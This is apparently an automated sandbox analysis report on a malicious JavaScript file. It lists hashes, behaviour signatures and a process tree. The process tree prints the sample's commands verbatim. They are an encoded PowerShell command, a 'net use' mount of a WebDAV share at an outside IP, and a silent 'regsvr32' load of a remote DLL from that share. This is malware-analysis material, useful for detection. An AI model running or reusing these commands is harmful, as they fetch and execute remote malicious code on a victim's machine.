Analysis
-
max time kernel
239s -
max time network
240s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
17481323262171426069.js
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
17481323262171426069.js
Resource
win10v2004-20241007-en
General
-
Target
17481323262171426069.js
-
Size
1.4MB
-
MD5
efe76939bd74fd51b7c0a2f736d07904
-
SHA1
e61ec5426def2b69c1fb953c982cfbde8b196cf5
-
SHA256
8dc5c525c854fa1f7a70c8c996290c8af71b5609279d30d53dcec1984fbd4703
-
SHA512
e7527ae59501b7a09f6fa5538ffc0a013fb95d85f83705739ab28887b96d55ab60cda2307afd75cd674d83bc92561c141dc69fdb4514f3d67443d8d972907876
-
SSDEEP
12288:2tSyK/Pok2/p6tnjLo2jLdZ0tr0KXuXTPh03z9pVn1zEPu:GQ/Pok2/p6tnjLo2jLd2WKNpjiu
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2784 timeout.exe -
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
regsvr32.exepid Process 2972 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2952 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
wscript.exepowershell.execmd.execmd.exedescription pid Process procid_target PID 2604 wrote to memory of 2952 2604 wscript.exe 29 PID 2604 wrote to memory of 2952 2604 wscript.exe 29 PID 2604 wrote to memory of 2952 2604 wscript.exe 29 PID 2952 wrote to memory of 2784 2952 powershell.exe 31 PID 2952 wrote to memory of 2784 2952 powershell.exe 31 PID 2952 wrote to memory of 2784 2952 powershell.exe 31 PID 2952 wrote to memory of 2896 2952 powershell.exe 32 PID 2952 wrote to memory of 2896 2952 powershell.exe 32 PID 2952 wrote to memory of 2896 2952 powershell.exe 32 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2952 wrote to memory of 2852 2952 powershell.exe 34 PID 2952 wrote to memory of 2852 2952 powershell.exe 34 PID 2952 wrote to memory of 2852 2952 powershell.exe 34 PID 2852 wrote to memory of 2972 2852 cmd.exe 35 PID 2852 wrote to memory of 2972 2852 cmd.exe 35 PID 2852 wrote to memory of 2972 2852 cmd.exe 35 PID 2852 wrote to memory of 2972 2852 cmd.exe 35 PID 2852 wrote to memory of 2972 2852 cmd.exe 35
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\17481323262171426069.js1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA4ADYAMgA2ADEAMgA3ADQANAAxADMANQAxADMALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\timeout.exe"C:\Windows\system32\timeout.exe" 13⤵
- Delays execution with timeout.exe
PID:2784
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\3⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\net.exenet use \\94.159.113.79@8888\davwwwroot\4⤵PID:2904
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\regsvr32.exeregsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2972
-
-
-